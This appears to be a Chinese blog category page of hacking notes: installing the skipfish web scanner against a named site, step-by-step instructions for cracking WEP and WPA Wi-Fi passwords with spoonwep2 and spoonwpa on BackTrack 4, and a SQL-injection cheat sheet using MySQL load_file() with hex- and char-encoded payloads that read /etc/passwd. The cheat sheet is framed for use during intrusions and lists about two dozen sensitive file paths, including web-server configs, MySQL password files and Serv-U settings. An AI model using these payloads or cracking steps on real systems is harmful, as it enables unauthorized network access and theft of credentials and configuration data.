分类目录归档:非安全之旁门左道

乱七八糟的一些东西

google的skipfish安全扫描

安装:
http://code.google.com/p/skipfish/wiki/SkipfishDoc
下载wget …….
先安装http://ftp.gnu.org/gnu/libidn/libidn-1.18.tar.gz
./configure
make
make install

完成后
wget http://code.google.com/p/skipfish/downloads/detail?name=skipfish-1.84b.tgz
直接make&&make install
需要openssl和openssl-devel

安装完成后,进入skipfish-1.84b目录,cp dictionaries/completes.wl skipfish.wl
运行:
./skipfish -o /root/scan.txt https://www.hardwork.cn即可

spoonwep2和spoonwpa破解注意点

【spoonwep2 破解法】

输入spoonwep2回车后就会弹出spoonwep2的窗口。
点击SPOONWEP SETTINGS,在NET CARD里选WLAN0,
在DRIVER里选NORMAL,
在MODE里选UNKNOWN VICTIM,再点击NEXT、
点击LAUNCH进入搜索

然后关闭spoonwep2再开一下,
点击SPOONWEP SETTINGS,
在NET CARD里选MON0,
在DRIVER里选NORMAL,
在MODE里选UNKNOWN VICTIM,
再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦,
选定1个网卡点击SELECTION OK,
选定PO841 REPLAY ATTACK(这里有4条命令选择),
点击LAUNCH后就等待密码的出来(sata数据包到30000个左右)。

【spoonwpa 破解法】

输入spoonwpa回车后就会弹出spoonwpa的窗口。
在NET CARD里选WLAN0,
在DRIVER里选NORMAL,
在MODE里选UNKNOWN VICTIM,
再点击NEXT、点击LAUNCH进入搜索,
然后关闭spoonwpa再开一下,
点击SPOONWEP SETTINGS,
在NET CARD里选MON0,
在DRIVER里选NORMAL,
在MODE里选UNKNOWN VICTIM,再点击NEXT、
点击LAUNCH进入搜索后就可以看见好多网卡啦,
选定1个必须有客户端的网卡点击SELECTION OK,
再点击LAUNCH AUTOMATED HANDSHAKE CAPTURE,
如抓到握手包,请点击金色锁开始破解,这完全靠运气了。

BT4下使用spoonwpa破解无线密码笔记

环境:
硬件—-vmware6.2虚拟机
网卡—-水星的MW54U  Ver6.0
操作系统—-BT4
软件—-spoonwpa,从
www.anywlan.com下载的all-spoon.rar文件
以图说明:
ifconfig -a显示

spoonwpa启动
1、设置

2、扫描无线网络

3、抓取握手包

4、自动调转到cracking,破解的页面如图

5、破解完成,原来密码是88888888,看来密码字典是一定要8的,呵呵。

load_file()函数的他用

load_file() 入侵时查看常用敏感信息文件

1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20)

2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.

3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

5、c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf    查看WINDOWS系统apache文件

6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.

7、c:/Resin/conf/resin.conf     /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机

8、d:\APACHE\Apache2\conf\httpd.conf  

9、C:\Program Files\mysql\my.ini

10、../themes/darkblue_orange/layout.inc.php    phpmyadmin 爆路径  

11、    c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置文件

12、 /usr/local/resin-3.0.22/conf/resin.conf    针对3.0.22的RESIN配置文件查看

13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上

14 、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看

15、 /etc/sysconfig/iptables 本看防火墙策略

16 、 usr/local/app/php5/lib/php.ini    PHP 的相当设置

17 、/etc/my.cnf    MYSQL的配置文件

18、 /etc/redhat-release 红帽子的系统版本

19 、C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.

21、/usr/local/app/php5/lib/php.ini //PHP相关设置

22、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

23、c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

24、c:\windows\my.ini